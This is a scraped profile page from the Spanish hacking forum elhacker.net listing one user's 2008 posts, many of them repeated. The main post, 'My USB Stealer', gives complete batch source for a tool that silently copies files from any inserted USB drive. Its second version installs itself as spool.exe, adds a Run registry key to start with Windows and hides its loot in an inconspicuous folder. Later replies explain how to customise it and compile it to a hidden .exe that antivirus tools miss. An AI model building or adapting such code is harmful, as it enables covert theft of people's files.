Excelente, SmartGenius, creo que eso era lo que faltaba.
Muchas gracias.
Nos vemos
Muchas gracias.
Nos vemos
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#232
Tutoriales - Documentación / Re: HOW-TO Crear Gusano de Memorias USB en BATCH
22 Noviembre 2008, 12:25 PM
ja, ja ja, muy irónico...
No iba por ti, stalker, iba por todos los novatos que "adoran" periódicamente en sus comentarios en este post a los códigos que se han puesto.
Y si de verdad sabes programar en batch... ¿podrías decir qué fallas teóricas y prácticas tiene ese código?
Y desde luego la mejor manera de hacer el foro grande sería eliminando posts inútiles...
No iba por ti, stalker, iba por todos los novatos que "adoran" periódicamente en sus comentarios en este post a los códigos que se han puesto.
Y si de verdad sabes programar en batch... ¿podrías decir qué fallas teóricas y prácticas tiene ese código?
Y desde luego la mejor manera de hacer el foro grande sería eliminando posts inútiles...
#233
Scripting / Re: My USB Stealer
21 Noviembre 2008, 19:40 PM
Vamos a ver que os estáis liando un poco...
Te aclaro lo que intentabais averiguar WestOn y tú...
Para añadir nuevas unidades al chequeo hay que seguir este patrón:
· Escaneamos la primera unidad (P.E: la E)
· Si existe, pasamos a la fase de copiado de esa unidad
· Si no existe, pasamos a la fase de chequeo de la unidad siguiente
· Si existe, cuando acabe de copiarse, que pase a la fase de chequeo de la unidad siguente
· Cuando lleguemos a la última unidad, en vez de seguir en la siguiente redireccionamos ambas a la primera.
De otro modo no funcionará.
Respecto al proceso XCOPY.exe que estaba en ejecución... si te fijas en el código se hace referencia al xcopy. ¿Qué es esto? Pues es un archivo ejecutable que funciona a través de la cmd y cuya función es copiar, en este caso el contenido íntegro de las memorias flash.
Si en vez de copiarlo todo sólo quieres copiar un cierto tipo de archivos, cambia la parte del código (en la que se llama al xcopy) que pone *.* por *.loquesea, siendo "loquesea" la extensión del tipo de archivos que quieras copiar. Puedes usar varias líneas para copiar distintos tipos de archivo. Me explico:
En caso de que quisieras copiar archivos de PowerPoint, cambiarías esto:
xcopy H:\*.* C:\STOLEN\*.* /E /I
Por esto:
xcopy H:\*.* C:\STOLEN\*.ppt /E /I
xcopy H:\*.* C:\STOLEN\*.pps /E /I
Y así para distintos tipos de archivo, por ejemplo:
xcopy H:\*.* C:\STOLEN\*.doc /E /I
xcopy H:\*.* C:\STOLEN\*.xls /E /I
xcopy H:\*.* C:\STOLEN\*.jpg /E /I
Si quieres copiar archivos de un cierto nombre, cambia el primer asterisco por el nombre que quieras copiar. Los asteriscos (*) hacen referencia a cadenas de caracteres indeterminados de longitud indeterminada. Las interrogaciones (?) hacen referencia a un solo caracter indeterminado.
No olvides que si vas a usar nombres de más de ocho letras o con espacios, o extensiones de más de tres letras (Formato 8/3) debes entrecomillar la ruta completa.
Respecto a que las memorias flash se puedan extraer de forma segura... la única forma es esperando a que acabe de copiar archivos y ampliando el tiempo de los pings. (Sólo puedes extraer una memoria flash de forma segura cuando no se está copiando ni comprobando nada, y esto se produce en el tiempo que dura el ping...) prueba a ampliarlo a tu gusto.
En cuanto a lo de que no se deja reiniciar, es porque el programa está haciendo su trabajo. Si quieres hacer que se pare por completo tienes dos opciones, o ir al administrador de tareas y parar los procesos correspondientes (el ping.exe, el xcopy.exe, el cmd.exe y %elnombredetuejecutable%.exe). Esto lo puedes automatizar en un batch de la siguiente forma:
Taskkill /IM cmd.exe /f
(supongo que al parar el cmd.exe se paran los otros, si no añade sus nombres de la misma forma)
Shutdown -r -t XX
Siendo -r la opción de reinicio (la de apagado es -s) y las XX el tiempo en segundos (P.Ej: 30, 03, 00...)
Respecto a lo de la desinstalación... debes borrar el ejecutable que hayas creado MIENTRAS ESTÉ PARADO (de lo contrario borras el archivo, pero éste sigue cargado en memoria, es decir, ejecutándose), y además la rama del registro que ha creado.
Esto lo puedes borrar desde el MSCONFIG, o si tienes el SpyBot, desde las opciones avanzadas.
Bueno, si te queda alguna duda, házmelo saber y trataré de responderte.
Nos vemos
PD: 8789poli, si te gusta el código se lo agradeces por privado la próxima vez, no vayas creando posts que no aportan nada y no vienen a cuento.
Venga, a cuidarse todos...
Te aclaro lo que intentabais averiguar WestOn y tú...
Para añadir nuevas unidades al chequeo hay que seguir este patrón:
· Escaneamos la primera unidad (P.E: la E)
· Si existe, pasamos a la fase de copiado de esa unidad
· Si no existe, pasamos a la fase de chequeo de la unidad siguiente
· Si existe, cuando acabe de copiarse, que pase a la fase de chequeo de la unidad siguente
· Cuando lleguemos a la última unidad, en vez de seguir en la siguiente redireccionamos ambas a la primera.
De otro modo no funcionará.
Respecto al proceso XCOPY.exe que estaba en ejecución... si te fijas en el código se hace referencia al xcopy. ¿Qué es esto? Pues es un archivo ejecutable que funciona a través de la cmd y cuya función es copiar, en este caso el contenido íntegro de las memorias flash.
Si en vez de copiarlo todo sólo quieres copiar un cierto tipo de archivos, cambia la parte del código (en la que se llama al xcopy) que pone *.* por *.loquesea, siendo "loquesea" la extensión del tipo de archivos que quieras copiar. Puedes usar varias líneas para copiar distintos tipos de archivo. Me explico:
En caso de que quisieras copiar archivos de PowerPoint, cambiarías esto:
xcopy H:\*.* C:\STOLEN\*.* /E /I
Por esto:
xcopy H:\*.* C:\STOLEN\*.ppt /E /I
xcopy H:\*.* C:\STOLEN\*.pps /E /I
Y así para distintos tipos de archivo, por ejemplo:
xcopy H:\*.* C:\STOLEN\*.doc /E /I
xcopy H:\*.* C:\STOLEN\*.xls /E /I
xcopy H:\*.* C:\STOLEN\*.jpg /E /I
Si quieres copiar archivos de un cierto nombre, cambia el primer asterisco por el nombre que quieras copiar. Los asteriscos (*) hacen referencia a cadenas de caracteres indeterminados de longitud indeterminada. Las interrogaciones (?) hacen referencia a un solo caracter indeterminado.
No olvides que si vas a usar nombres de más de ocho letras o con espacios, o extensiones de más de tres letras (Formato 8/3) debes entrecomillar la ruta completa.
Respecto a que las memorias flash se puedan extraer de forma segura... la única forma es esperando a que acabe de copiar archivos y ampliando el tiempo de los pings. (Sólo puedes extraer una memoria flash de forma segura cuando no se está copiando ni comprobando nada, y esto se produce en el tiempo que dura el ping...) prueba a ampliarlo a tu gusto.
En cuanto a lo de que no se deja reiniciar, es porque el programa está haciendo su trabajo. Si quieres hacer que se pare por completo tienes dos opciones, o ir al administrador de tareas y parar los procesos correspondientes (el ping.exe, el xcopy.exe, el cmd.exe y %elnombredetuejecutable%.exe). Esto lo puedes automatizar en un batch de la siguiente forma:
Taskkill /IM cmd.exe /f
(supongo que al parar el cmd.exe se paran los otros, si no añade sus nombres de la misma forma)
Shutdown -r -t XX
Siendo -r la opción de reinicio (la de apagado es -s) y las XX el tiempo en segundos (P.Ej: 30, 03, 00...)
Respecto a lo de la desinstalación... debes borrar el ejecutable que hayas creado MIENTRAS ESTÉ PARADO (de lo contrario borras el archivo, pero éste sigue cargado en memoria, es decir, ejecutándose), y además la rama del registro que ha creado.
Esto lo puedes borrar desde el MSCONFIG, o si tienes el SpyBot, desde las opciones avanzadas.
Bueno, si te queda alguna duda, házmelo saber y trataré de responderte.
Nos vemos
PD: 8789poli, si te gusta el código se lo agradeces por privado la próxima vez, no vayas creando posts que no aportan nada y no vienen a cuento.
Venga, a cuidarse todos...
#234
Tutoriales - Documentación / Re: HOW-TO Crear Gusano de Memorias USB en BATCH
21 Noviembre 2008, 19:14 PM
Sí petarte el antivirus...
¿Queréis dejar de revivir este tema, j*der??
Ambos códigos (el de octalh y el mío) son una *****, están sin trabajar, en bruto...
Si quereis aprender a hacer gusanos y cosas en batch hay un subforo muy hermoso llamado "Programación General">"Scripting"
Es asombroso como cada cierto tiempo alguien reabre este post...
¿Queréis dejar de revivir este tema, j*der??
Ambos códigos (el de octalh y el mío) son una *****, están sin trabajar, en bruto...
Si quereis aprender a hacer gusanos y cosas en batch hay un subforo muy hermoso llamado "Programación General">"Scripting"
Es asombroso como cada cierto tiempo alguien reabre este post...
#235
Scripting / Re: Ejecución condicional [Batch] LEER
19 Noviembre 2008, 22:40 PMCitarEsto es muy importante saberlo, nos permite ahorrar muchas lineas de codigo, ademas de que el codigo se ve mas legible y elegante.
Efectivamente, considero que es un gran aporte que se expliquen con claridad este tipo de cosas.
Además me gusta tu forma de explicar, serías buen profesor...
¿Nunca has pensado en hacer un manual completo de tu propia cosecha?
Saludos!
#236
Scripting / Re: My USB Stealer
19 Noviembre 2008, 22:34 PM
Hola estudcom,
Hay un par de cosas del code que debes cambiar:
Si quieres copiar los archivos a C:\z434733\eviews\ tienes que cambiar la siguiente parte del código:
Código original:
xcopy %USBLETTER%:\*.* C:\STOLEN\*.* /E /I (siendo %USBLETTER% la letra de la unidad extraíble, es decir, E, F, G, H y las que tú le quieras meter si creas más redirecciones)
Códig%USBLETTER%:\*.* C:\z434733\eviews\*.* /E /I
Es decir, en la segunda ruta especificas la dirección a la que se va a copiar.
(NOTA: Veo que has puesto la dirección de C:\z434733\eviews\ con esta barra: /. En batch la barra que se utiliza para definir las rutas es esta: \ [la barra inversa])
Respecto a que no se te cambian las extensiones de los archivos del bloc de notas: quizá no tengas habilitadas las extensiones en el ordenador en el que trabajas (es decir, en vez de ver el nombre de archivo "Prueba.txt", por poner un ejemplo, veas símplemente "Prueba"). ¿Qué pasa en ese caso? Que al ponerle extensión .bat realmente no le estás dando una nueva extensión, ya que las tienes ocultas, sino que al archivo "prueba" le estás dando el nuevo nombre de "prueba.bat", siendo la extensión de ambos la de .txt
Resumiendo, no le estás cambiando realmente la extensión al archivo, sino que estás haciendo archivos con nombres como "prueba.bat.txt".
Para corregir eso ve a la pestaña "herramientas" en cualquier carpeta, de ahí a la opción "opciones de carpeta", y una vez ahí selecciona la pestaña "ver". Dentro de ella hay un listado de opciones, unas marcadas y otras sin marcar. Cerca del final hay una llamada "Ocultar las extensiones para tipos de archivo conocido". Desmárcala si está marcada.
De todas maneras este código no está pensado para renombrar el archivo a .bat y ejecutarlo, ya que la idea es que corra oculto a la vista del usuario.
Si te fijas, en las primeras líneas de código está la orden:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
¿Qué significa esto? Que copie el archivo actual (%0), desde la ruta que sea y con el nombre que sea a la carpeta C:\Archivos de Programa\USB\ y con el nombre de archivo de spool.exe
Para que funcione correctamente al copiarse a cualquier sitio con la extensión .exe el archivo tiene que ser un .exe. Si renombramos un .bat a un .exe directamente no corre.
Entonces lo que debes hacer es descargarte un compilador, como por ejemplo el Quick Batch File Compiler (a ser posible una de las últmas versiones, ya que los archivos compilados por versiones anteriores son detectados por los antivirus aunque en realidad no lo sean). Esto lo puedes encontrar en varios posts de este foro, sobre todo en los manuales de Octalh, o si no buscando un poco en google, que también sale.
Por cierto, si quieres darle otro nombre al ejecutable (que no se llame en último término spool.exe) debes cambiar el nombre en la rama de:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
y en la de:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
De la misma manera, si quieres copiarlo a otra carpeta, sólo cambia las rutas de
%PROGRAMFILES%\USB\
en ambas líneas.
Hay un par de cosas del code que debes cambiar:
Si quieres copiar los archivos a C:\z434733\eviews\ tienes que cambiar la siguiente parte del código:
Código original:
xcopy %USBLETTER%:\*.* C:\STOLEN\*.* /E /I (siendo %USBLETTER% la letra de la unidad extraíble, es decir, E, F, G, H y las que tú le quieras meter si creas más redirecciones)
Códig%USBLETTER%:\*.* C:\z434733\eviews\*.* /E /I
Es decir, en la segunda ruta especificas la dirección a la que se va a copiar.
(NOTA: Veo que has puesto la dirección de C:\z434733\eviews\ con esta barra: /. En batch la barra que se utiliza para definir las rutas es esta: \ [la barra inversa])
Respecto a que no se te cambian las extensiones de los archivos del bloc de notas: quizá no tengas habilitadas las extensiones en el ordenador en el que trabajas (es decir, en vez de ver el nombre de archivo "Prueba.txt", por poner un ejemplo, veas símplemente "Prueba"). ¿Qué pasa en ese caso? Que al ponerle extensión .bat realmente no le estás dando una nueva extensión, ya que las tienes ocultas, sino que al archivo "prueba" le estás dando el nuevo nombre de "prueba.bat", siendo la extensión de ambos la de .txt
Resumiendo, no le estás cambiando realmente la extensión al archivo, sino que estás haciendo archivos con nombres como "prueba.bat.txt".
Para corregir eso ve a la pestaña "herramientas" en cualquier carpeta, de ahí a la opción "opciones de carpeta", y una vez ahí selecciona la pestaña "ver". Dentro de ella hay un listado de opciones, unas marcadas y otras sin marcar. Cerca del final hay una llamada "Ocultar las extensiones para tipos de archivo conocido". Desmárcala si está marcada.
De todas maneras este código no está pensado para renombrar el archivo a .bat y ejecutarlo, ya que la idea es que corra oculto a la vista del usuario.
Si te fijas, en las primeras líneas de código está la orden:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
¿Qué significa esto? Que copie el archivo actual (%0), desde la ruta que sea y con el nombre que sea a la carpeta C:\Archivos de Programa\USB\ y con el nombre de archivo de spool.exe
Para que funcione correctamente al copiarse a cualquier sitio con la extensión .exe el archivo tiene que ser un .exe. Si renombramos un .bat a un .exe directamente no corre.
Entonces lo que debes hacer es descargarte un compilador, como por ejemplo el Quick Batch File Compiler (a ser posible una de las últmas versiones, ya que los archivos compilados por versiones anteriores son detectados por los antivirus aunque en realidad no lo sean). Esto lo puedes encontrar en varios posts de este foro, sobre todo en los manuales de Octalh, o si no buscando un poco en google, que también sale.
Por cierto, si quieres darle otro nombre al ejecutable (que no se llame en último término spool.exe) debes cambiar el nombre en la rama de:
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
y en la de:
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
De la misma manera, si quieres copiarlo a otra carpeta, sólo cambia las rutas de
%PROGRAMFILES%\USB\
en ambas líneas.
#237
Scripting / Re: My USB Stealer
19 Noviembre 2008, 14:31 PM
Si lees los códigos que hice yo al principio del post verás que justamente lo que explican es cómo hacértelo tú mismo a partir de las plantillas que puse, todo muy casero y muy rudimentario, pero oculto y funcional.
Intenta hacerlo tú, y si tienes algún problema con los códigos en batch o al compilar me comentas
Intenta hacerlo tú, y si tienes algún problema con los códigos en batch o al compilar me comentas
#238
Scripting / Re: My USB Stealer
24 Octubre 2008, 10:11 AM
Fascinante... un trabajo realmente fino.
Enhorabuena.
Enhorabuena.
#239
Scripting / Re: My USB Stealer
3 Octubre 2008, 13:03 PM
No está mal, no está mal, es muy bueno el code que sugieres... 
la idea general que yo proponía es que fuera simple, lo básico, cuatro cosas y ya está, e ir configurándolo según las necesidades cambiando el código fuente... vosotros lo que habéis hecho es currároslo un montón.
Gracias por el aporte, voy a probar vuestro código cuando tenga un momento.
Un saludo
la idea general que yo proponía es que fuera simple, lo básico, cuatro cosas y ya está, e ir configurándolo según las necesidades cambiando el código fuente... vosotros lo que habéis hecho es currároslo un montón.Gracias por el aporte, voy a probar vuestro código cuando tenga un momento.
Un saludo
#240
Scripting / My USB Stealer
1 Octubre 2008, 18:26 PM
Hola a todos!
Hoy os traigo la plantilla de un código en batch cuya función es copiar el contenido de memorias externas a una carpeta del disco duro de manera automática.
La plantilla es:
Como podemos ver el código es bastante tosco. Esto es así porque está pensado para usarse como modelo de partida para otros códigos más específicos.
Por ejemplo, imaginemos que queremos que el programa copie un tipo de archivos concretos a una carpeta menos llamativa que C:\STOLEN, y que además queremos que lo haga siempre, sin necesidad de que nosotros ejecutemos el programa.
Pues partiendo del código anterior, con unas pequeñas modificaciones obtenemos un código como este:
Aquí vemos que el programa se copiaría a la carpeta de Archivos de Programa, y crearía una clave en el registro que lo auto-iniciaría con windows, para evitar tener que andarlo ejecutando continuamente.
Además, los datos se copian a la carpeta %USERPROFILE%\USB\, que llama menos la atención que C:\STOLEN, obviamente
NOTA IMPORTANTE: Para que el programa funcione, es necesario compilarlo a .exe y dotarlo de la caracterísitca de ejecutarse en modo oculto.
Espero que este código os sea de utilidad a los que buscábais algo parecido (yo en su momento lo busqué), ya que así por lo menos no os arriesgáis a que el programa que os descargáis traiga "regalito". (Ventajas de conocer el código fuente
)
Hasta otra!
Hoy os traigo la plantilla de un código en batch cuya función es copiar el contenido de memorias externas a una carpeta del disco duro de manera automática.
La plantilla es:
Código (bash) [Seleccionar]
::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
:: Construido en arquitectura on-demand (hay que ejecutar el programa para que realice la orden).
:: Este sistema copia todos los archivos. Es posible adaptar el code para que copie solo archivos con un nombre y/o una extensión concreta.
@echo off
If Exist C:\STOLEN (goto echeck) else (
MD C:\STOLEN
goto echeck
)
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
:existe
ping -n 2 localhost
xcopy E:\*.* C:\STOLEN\*.* /E /I
(goto fcheck)
:existf
ping -n 2 localhost
xcopy F:\*.* C:\STOLEN\*.* /E /I
(goto gcheck)
:existg
xcopy G:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto hcheck)
:existh
xcopy H:\*.* C:\STOLEN\*.* /E /I
ping -n 2 localhost
(goto echeck)
Como podemos ver el código es bastante tosco. Esto es así porque está pensado para usarse como modelo de partida para otros códigos más específicos.
Por ejemplo, imaginemos que queremos que el programa copie un tipo de archivos concretos a una carpeta menos llamativa que C:\STOLEN, y que además queremos que lo haga siempre, sin necesidad de que nosotros ejecutemos el programa.
Pues partiendo del código anterior, con unas pequeñas modificaciones obtenemos un código como este:
Código (bash) [Seleccionar]
::Code pensado para detectar y copiar todo el contenido de un USB conectado al equipo.
:: Construido en arquitectura always-on (una vez instalado, se ejecuta siempre).
:: El tipo de archivos que va a copiar son JPG y BMP. Esto es configurable.
@echo off
If Exist "%PROGRAMFILES%\USB\spool.exe" (goto alpha) else (goto betha)
:betha
MD "%PROGRAMFILES%\USB\"
copy /y %0 "%PROGRAMFILES%\USB\spool.exe"
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v spool /d "%PROGRAMFILES%\USB\spool.exe" /f
goto alpha
:alpha
If Exist "%USERPROFILE%\USB\" (goto echeck) else (
MD "%USERPROFILE%\USB\"
goto echeck
)
:echeck
ping -n 30 localhost
if exist E:\ (goto existe) else (goto fcheck)
:fcheck
ping -n 2 localhost
if exist F:\ (goto existf) else (goto gcheck)
:gcheck
ping -n 2 localhost
if exist G:\ (goto existg) else (goto hcheck)
:hcheck
ping -n 2 localhost
if exist H:\ (goto existh) else (goto echeck)
:existe
ping -n 2 localhost
xcopy E:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy E:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
(goto fcheck)
:existf
ping -n 2 localhost
xcopy F:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy F:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
(goto gcheck)
:existg
xcopy G:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy G:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
ping -n 2 localhost
(goto hcheck)
:existh
xcopy H:\*.jpg "%USERPROFILE%\USB\*.jpg" /E /I
xcopy H:\*.jpg "%USERPROFILE%\USB\*.bmp" /E /I
ping -n 2 localhost
(goto echeck)
Aquí vemos que el programa se copiaría a la carpeta de Archivos de Programa, y crearía una clave en el registro que lo auto-iniciaría con windows, para evitar tener que andarlo ejecutando continuamente.
Además, los datos se copian a la carpeta %USERPROFILE%\USB\, que llama menos la atención que C:\STOLEN, obviamente
NOTA IMPORTANTE: Para que el programa funcione, es necesario compilarlo a .exe y dotarlo de la caracterísitca de ejecutarse en modo oculto.
Espero que este código os sea de utilidad a los que buscábais algo parecido (yo en su momento lo busqué), ya que así por lo menos no os arriesgáis a que el programa que os descargáis traiga "regalito". (Ventajas de conocer el código fuente
)Hasta otra!